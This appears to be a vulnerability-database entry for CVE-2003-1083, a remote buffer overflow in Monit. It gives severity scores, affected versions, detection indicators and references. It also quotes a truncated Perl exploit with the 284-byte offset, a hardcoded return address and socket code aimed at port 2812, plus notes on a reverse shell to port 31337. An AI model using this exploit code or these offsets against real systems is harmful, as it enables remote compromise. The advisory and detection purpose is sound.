CVE-2003-1083
Published 2003-12-31
CVE-2003-1083: Stack-based buffer overflow in Monit 1.4 to 4.1 allows remote attackers to execute arbitrary code via a long HTTP request.
Priority: P355 · critical · 10.0 (CVSS 2.0: AV:N/AC:L/Au:N/C:C/I:C/A:C)
Exploit: available
EPSS: 21.11% (97.3rd percentile)
Affected (22 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | monit | < 1:4.2.1-1 (bookworm) | 1:4.2.1-1 (bookworm) |
| tildeslash | monit | >= 0 < 1:4.2.1-1 (listed 4 times) | 1:4.2.1-1 |
| tildeslash | monit | — (17 further ranges listed without version data) | — |
Detection & IOCs (extracted from sources)
- bytes: `\xcf\x89\xb3\x40` (the Mandrake 9.1 return address 0x40b389cf, little-endian)
- bytes: `\x83\xC4\x40`
- Monit's HTTP listener on TCP/2812 is the attack surface; monitor for oversized HTTP requests (more than 256 bytes of payload) sent to this port, particularly those containing NOP sleds (0x90 sequences) followed by shellcode.
- The exploit payload is terminated with a bare double newline (`\n\n`) rather than a well-formed HTTP request; detect traffic to port 2812 that lacks standard HTTP method/version headers but ends with `\n\n`.
- The reverse shellcode connects back to the attacker on a configurable port (default 31337); monitor for unexpected outbound TCP connections from the Monit process, especially to port 31337.
- The exploit buffer uses a fixed offset of 284 bytes before the return address overwrite; IDS signatures can match payloads to TCP/2812 containing 284 or more repeated bytes followed by a 4-byte EIP value.
- The return address used in exploit 1 (0x40b389cf) is specific to Mandrake 9.1 builds of Monit; the exploit for other distributions requires a different EIP value and offset, so signatures based solely on the hardcoded return address will miss cross-platform variants.
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| osv | — | 10.0 | CRITICAL | — |
| vendor_debian | — | 10.0 | CRITICAL | — |
GHSA
GHSA-6p52-6mw3-w4wv: Stack-based buffer overflow in Monit 1 [HIGH]
ghsa_unreviewed · 2022-04-29
Stack-based buffer overflow in Monit 1.4 to 4.1 allows remote attackers to execute arbitrary code via a long HTTP request.
OSV
CVE-2003-1083: Stack-based buffer overflow in Monit 1 [CRITICAL]
osv · 2003-12-31 · CVSS 10.0
Stack-based buffer overflow in Monit 1.4 to 4.1 allows remote attackers to execute arbitrary code via a long HTTP request.
Debian
CVE-2003-1083: monit - Stack-based buffer overflow in Monit 1.4 to 4.1 [CRITICAL]
vendor_debian · 2003 · CVSS 10.0
Stack-based buffer overflow in Monit 1.4 to 4.1 allows remote attackers to execute arbitrary code via a long HTTP request.
Scope: local
| Suite | Status |
|---|---|
| bookworm | resolved (fixed in 1:4.2.1-1) |
| bullseye | resolved (fixed in 1:4.2.1-1) |
| forky | resolved (fixed in 1:4.2.1-1) |
| sid | resolved (fixed in 1:4.2.1-1) |
| trixie | resolved (fixed in 1:4.2.1-1) |
No detection rules found.
Exploit-DB
Monit 4.1 - Remote Buffer Overflow
exploitdb · 2004-04-09 · CVE-2003-1083
---
```perl
#!/usr/bin/perl
#
# monit \n\n";
exit(0);
}
print "HOST:\t$ARGV[0]\n";
print "PORT:\t2812\n";
my $buffer = "B" x 284 . "\xcf\x89\xb3\x40" . $shellcode; # esp mandrake 9.1
#my $buffer = "A" x 284 . "XXXX" . "B" x 100; #dos and debug
print "connecting to server...\n";
$socket = IO::Socket::INET -> new( PeerAddr => $ARGV[0],
                                   PeerPort => 2812,
                                   Proto    => "tcp");
if(!defined($socket))
{
    print "could not connect :-P\n";
    sleep(1);
    exit(0);
}
print "connected\n";
sleep(1);
print "sending string\n";
print $socket $buffer;
close $socket;
print "\ndosed!\n";
# milw0rm.com [2004-04-09]
```
Exploit-DB
Monit 1.4/2.x/3/4 - 'HTTP Request' Buffer Overrun
exploitdb · 2003-11-24 · CVE-2003-1083
---
source: https://www.securityfocus.com/bid/9099/info
A buffer overrun vulnerability has been discovered in Monit 4.1 and earlier that could be exploited remotely to gain root privileges. The problem is caused by insufficient bounds checking when handling overly long HTTP requests. As a result, a remote attacker may be able to corrupt sensitive process data on the stack in such a way that the execution flow of Monit can be controlled.
Successful exploitation of this condition could allow the execution of arbitrary code with root privileges.
// Michel, http://www.cycom.se
```perl
#!/usr/bin/perl
#
# Monit 4.1 (possibly earlier too) remote shell exploit (HTTP)
# (C) 2004 by Shadowinteger
#
# Verbatim copying, distribution and/o
```
No writeups or analysis indexed.
References
- http://secunia.com/advisories/10280
- http://security.gentoo.org/glsa/glsa-200403-14.xml
- http://www.kb.cert.org/vuls/id/623854
- http://www.securityfocus.com/archive/1/345417
- http://www.securityfocus.com/bid/9099
- http://www.tildeslash.com/monit/dist/CHANGES.txt
- https://exchange.xforce.ibmcloud.com/vulnerabilities/13817